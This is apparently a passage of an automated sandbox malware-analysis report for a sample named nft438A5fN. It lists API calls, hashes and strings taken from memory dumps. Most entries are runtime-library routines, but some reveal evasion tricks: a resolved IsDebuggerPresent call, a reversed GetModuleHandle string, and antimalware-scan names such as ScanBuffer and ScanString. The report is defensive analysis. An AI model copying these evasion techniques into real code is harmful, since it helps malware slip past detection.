                                                                      • Opcode Fuzzy Hash: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                                      • Instruction Fuzzy Hash: ED41D136A002149FCF24DFB8C884A6DB7B6EF84718F1585AAE915EB354DB71ED01CB90
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: __dosmaperr$_free
                                                                      • String ID:
                                                                      • API String ID: 242264518-0
                                                                      • Opcode ID: 65e47024088546fc334146591d56820f873165bf99cfabfd31b4add3ed5f98c2
                                                                      • Instruction ID: 378c99d4ea8789d0e3b7a380205fc595e8f344678926cc366e26dba1508f2780
                                                                      • Opcode Fuzzy Hash: 65e47024088546fc334146591d56820f873165bf99cfabfd31b4add3ed5f98c2
                                                                      • Instruction Fuzzy Hash: 56315C7240426AFFDF11AFA4CC44AAE7B69EF05365F104269FD28562A0DBB1CD10CB61
                                                                      APIs
                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 02D51986
                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 02D5199F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Value___vcrt_
                                                                      • String ID:
                                                                      • API String ID: 1426506684-0
                                                                      • Opcode ID: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                                      • Instruction ID: c810af6a45df6ea2d27e425eddf6a4090c90c30223b4e27d46cb1dcc4790723a
                                                                      • Opcode Fuzzy Hash: 786e665d26cf754d1d2cf441f113ccf6d654ddd054b4af6544b9cbcea7eecff9
                                                                      • Instruction Fuzzy Hash: 7D01D8331093716EAE1427B8AC84766274AFB067B5B20433AED2C417F0EFD1CC84C968
                                                                      APIs
                                                                      • GetThreadLocale.KERNEL32(?,00000000,02C9AAE7,?,?,00000000), ref: 02C9AA68
                                                                        • Part of subcall function 02C9A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02C9A7E2
                                                                      • GetThreadLocale.KERNEL32(00000000,00000004,00000000,02C9AAE7,?,?,00000000), ref: 02C9AA98
                                                                      • EnumCalendarInfoA.KERNEL32(Function_0000A99C,00000000,00000000,00000004), ref: 02C9AAA3
                                                                      • GetThreadLocale.KERNEL32(00000000,00000003,00000000,02C9AAE7,?,?,00000000), ref: 02C9AAC1
                                                                      • EnumCalendarInfoA.KERNEL32(Function_0000A9D8,00000000,00000000,00000003), ref: 02C9AACC
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Locale$InfoThread$CalendarEnum
                                                                      • String ID:
                                                                      • API String ID: 4102113445-0
                                                                      • Opcode ID: 795f9baee7e2dd15381776190d845852933b8759d6e0412b374d98308ba3b029
                                                                      • Instruction ID: e44dd32abcbbf7b32097a7df14e8364996c2799efd1505e9a5eb168efcb6e13e
                                                                      • Opcode Fuzzy Hash: 795f9baee7e2dd15381776190d845852933b8759d6e0412b374d98308ba3b029
                                                                      • Instruction Fuzzy Hash: 6901A2B52802447FFE11AA74CD1DB6A776DDB86710F620570F400A66C0DA759E00AA68
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _free
                                                                      • String ID:
                                                                      • API String ID: 269201875-0
                                                                      • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                      • Instruction ID: d0d8ba9ab7cbf69f2e56b785eea879a5d1c1526ddab7fa38f4b79ea5921d2af6
                                                                      • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                      • Instruction Fuzzy Hash: 1AF0FF325043246B8B30EB5CE885E2A77DAEA09754BE4891AE548DB750DB71FC80CA74
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: __aulldiv
                                                                      • String ID: LfF$xdF$NG
                                                                      • API String ID: 3732870572-2534066922
                                                                      • Opcode ID: 2a6cbd74b7f1d7262aabe967babe0c7563b8d160d0352d0a7d413315700012c3
                                                                      • Instruction ID: 16ecbfc8607127159e6c55fb4bbfda8fc63b8f3a6b016a0ea7c785ecaa0037b1
                                                                      • Opcode Fuzzy Hash: 2a6cbd74b7f1d7262aabe967babe0c7563b8d160d0352d0a7d413315700012c3
                                                                      • Instruction Fuzzy Hash: 65B19171608350AFC214EB24D861AAEB7EAEFE4314F40491EF48A52790EF359D49CF67
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: __dosmaperr
                                                                      • String ID: H
                                                                      • API String ID: 2332233096-2852464175
                                                                      • Opcode ID: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                                      • Instruction ID: e74721125b90de7d41128cd93e4af127028ba4d7092fe7f242402f6ffff06459
                                                                      • Opcode Fuzzy Hash: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                                      • Instruction Fuzzy Hash: E1A14732A101149FDF19EF68EC98BBD7BA2EB0A324F14015DE851AB3D1DB318C12CB61
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: __freea
                                                                      • String ID: PkGNG
                                                                      • API String ID: 240046367-263838557
                                                                      • Opcode ID: 063005e08074a30aa5a7525b1a3cdd37634a4b88fb4996d08a0078e91088f893
                                                                      • Instruction ID: 9574f3f4de23991a2caf9edc309d2cb888347c84bc756d231743c28482fca384
                                                                      • Opcode Fuzzy Hash: 063005e08074a30aa5a7525b1a3cdd37634a4b88fb4996d08a0078e91088f893
                                                                      • Instruction Fuzzy Hash: F251BF72610216ABDB258F64CC8CEBF77AAEF54754F194629FD04D6290EB34EC40CAA0
                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 02D1FDDC
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 02D1FEBD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Exception@8H_prologThrow
                                                                      • String ID: xdF$y~E
                                                                      • API String ID: 3222999186-3309775686
                                                                      • Opcode ID: 3108295a3ea490f6f4279643bcf91a98a4e8460a72a47f708dfbc03d5f7be2ca
                                                                      • Instruction ID: 6d3f2e8c6216aaf41150814a0bba5b7753cea6232c9e0c49d96bf82746ebeac9
                                                                      • Opcode Fuzzy Hash: 3108295a3ea490f6f4279643bcf91a98a4e8460a72a47f708dfbc03d5f7be2ca
                                                                      • Instruction Fuzzy Hash: DE517172900219BBCB04FB74ED669ED777AEF54304F500169A806A7A90EF349F49CFA1
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _free_strpbrk
                                                                      • String ID: *?$.
                                                                      • API String ID: 3300345361-3972193922
                                                                      • Opcode ID: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                                      • Instruction ID: 1aaa63bf95f0e0fa0edaff782d1093a142c333de1c35ba6ad599e70b94f9cd2c
                                                                      • Opcode Fuzzy Hash: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                                      • Instruction Fuzzy Hash: 96515975E0021AABDF24CFA8D884ABDBBB5EF48314F24816AD854E7340E7759E41CF60
                                                                      APIs
                                                                      • GetThreadLocale.KERNEL32(?,00000000,02C9ACD0,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 02C9AB2F
                                                                        • Part of subcall function 02C9A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02C9A7E2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Locale$InfoThread
                                                                      • String ID: eeee$ggg$yyyy
                                                                      • API String ID: 4232894706-1253427255
                                                                      • Opcode ID: 1a2b5930bda1db596a761a6144c61a40420cf3817a05bf36a21038f9f33806e6
                                                                      • Instruction ID: 24772336138fb5b5fd296aa879d6d6898b73c82ccf027480ef0302590df16e9c
                                                                      • Opcode Fuzzy Hash: 1a2b5930bda1db596a761a6144c61a40420cf3817a05bf36a21038f9f33806e6
                                                                      • Instruction Fuzzy Hash: B3411AB17049084BDF25EB79889C7BEB3EBDFC6304B504525D442CB344DA36EE02EA65
                                                                      APIs
                                                                      • GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02CA823C,?,?,00000000,?,02CA7A7E,ntdll,00000000,00000000,02CA7AC3,?,?,00000000), ref: 02CA820A
                                                                        • Part of subcall function 02CA8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02CA82FC,?,?,00000000,00000000,?,02CA8215,00000000,KernelBASE,00000000,00000000,02CA823C), ref: 02CA82C1
                                                                        • Part of subcall function 02CA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CA82C7
                                                                        • Part of subcall function 02CA8274: GetProcAddress.KERNEL32(?,?), ref: 02CA82D9
                                                                      • GetModuleHandleA.KERNELBASE(?), ref: 02CA821E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: HandleModule$AddressProc
                                                                      • String ID: AeldnaHeludoMteG$KernelBASE
                                                                      • API String ID: 1883125708-1952140341
                                                                      • Opcode ID: 5c73fcf250898e2559682889ee4c8ff94d12e23d38c7d34090319b04bef3d431
                                                                      • Instruction ID: d08b33c2d246595f71a0d7498c9b54864cce8e7f01ac5f4d9e4138bfa6557e4e
                                                                      • Opcode Fuzzy Hash: 5c73fcf250898e2559682889ee4c8ff94d12e23d38c7d34090319b04bef3d431
                                                                      • Instruction Fuzzy Hash: 78F06271A84704BFEB14EBA4DC25969B7EEF74A7047514660B80083B10D730AE11A924
                                                                      APIs
                                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 02D4C8D4
                                                                        • Part of subcall function 02D4C83D: std::exception::exception.LIBCONCRT ref: 02D4C84A
                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 02D4C8E2
                                                                        • Part of subcall function 02D4D195: ___crtInitializeCriticalSectionEx.LIBCPMT ref: 02D4D1A2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CriticalException@8InitializeSectionThrow___crtstd::exception::exceptionstd::invalid_argument::invalid_argument
                                                                      • String ID: !G$` G
                                                                      • API String ID: 64778976-1850324976
                                                                      • Opcode ID: a5f87e4ec28c6f1509e93140d5bb26fd2096d98fbde0f457b3520502c9e02379
                                                                      • Instruction ID: e3b5112bdb55553f09b40dae7e179fd3f04da13ed0f9a1c6618b3cff10b3eae0
                                                                      • Opcode Fuzzy Hash: a5f87e4ec28c6f1509e93140d5bb26fd2096d98fbde0f457b3520502c9e02379
                                                                      • Instruction Fuzzy Hash: 65E0D836D21118379B00B6BCAD049C9739EDE44350B404077EE15E3250FFA88E41C9E8
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(KernelBase,?,02CAFAEB,UacInitialize,02D17380,02CBB7B8,OpenSession,02D17380,02CBB7B8,ScanBuffer,02D17380,02CBB7B8,ScanString,02D17380,02CBB7B8,Initialize), ref: 02CAF6EE
                                                                      • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02CAF700
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      APIs
                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,?,02CBD10B,00000000,02CBD11E), ref: 02C9C47A
                                                                      • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 02C9C48B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      APIs
                                                                      • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02C9E297
                                                                      • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02C9E2B3
                                                                      • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02C9E32A
                                                                      • VariantClear.OLEAUT32(?), ref: 02C9E353
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      APIs
                                                                      • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02C9AD59
                                                                      • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02C9AD7D
                                                                      • GetModuleFileNameA.KERNEL32(02C90000,?,00000105), ref: 02C9AD98
                                                                      • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02C9AE2E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      APIs
                                                                      • ___BuildCatchObject.LIBVCRUNTIME ref: 02D50E8A
                                                                        • Part of subcall function 02D514C2: ___BuildCatchObjectHelper.LIBVCRUNTIME ref: 02D514F1
                                                                        • Part of subcall function 02D514C2: ___AdjustPointer.LIBCMT ref: 02D5150C
                                                                      • _UnwindNestedFrames.LIBCMT ref: 02D50EA1
                                                                      • ___FrameUnwindToState.LIBVCRUNTIME ref: 02D50EB3
                                                                      • CallCatchBlock.LIBVCRUNTIME ref: 02D50ED7
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      APIs
                                                                      • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 02D50541
                                                                      • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 02D50546
                                                                      • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 02D5054B
                                                                        • Part of subcall function 02D51A4A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 02D51A5B
                                                                      • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 02D50560
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID: e~E$NG
                                                                      • API String ID: 3519838083-1735957280
                                                                      • Opcode ID: 877520488350caf044840e68d165166ca8221db523610587b081686920612f7b
                                                                      • Instruction ID: f3afa22811a0c984ec43b4b72810d37f0fd3d227c3cfde7cfefb50dd7e6278b1
                                                                      • Opcode Fuzzy Hash: 877520488350caf044840e68d165166ca8221db523610587b081686920612f7b
                                                                      • Instruction Fuzzy Hash: C16175A3B0421477DB04AE66ED7596FB6DBEFD4758F08092DB446D3B40D924CD08CAA2
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: __fassign
                                                                      • String ID: PkGNG
                                                                      • API String ID: 3965848254-263838557
                                                                      • Opcode ID: df6090bc8f26b7e29a48799c2f63ef8664aacbe2c579135c1419eb37ea41631a
                                                                      • Instruction ID: cd6e9741b4c30e044c9421e7813dead833c78550126b6c898165b3a82526d763
                                                                      • Opcode Fuzzy Hash: df6090bc8f26b7e29a48799c2f63ef8664aacbe2c579135c1419eb37ea41631a
                                                                      • Instruction Fuzzy Hash: 1A519071A00249AFDB10CFA8D889AFEBBF8EF09300F14456AE955E7391E7709D40CB65
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
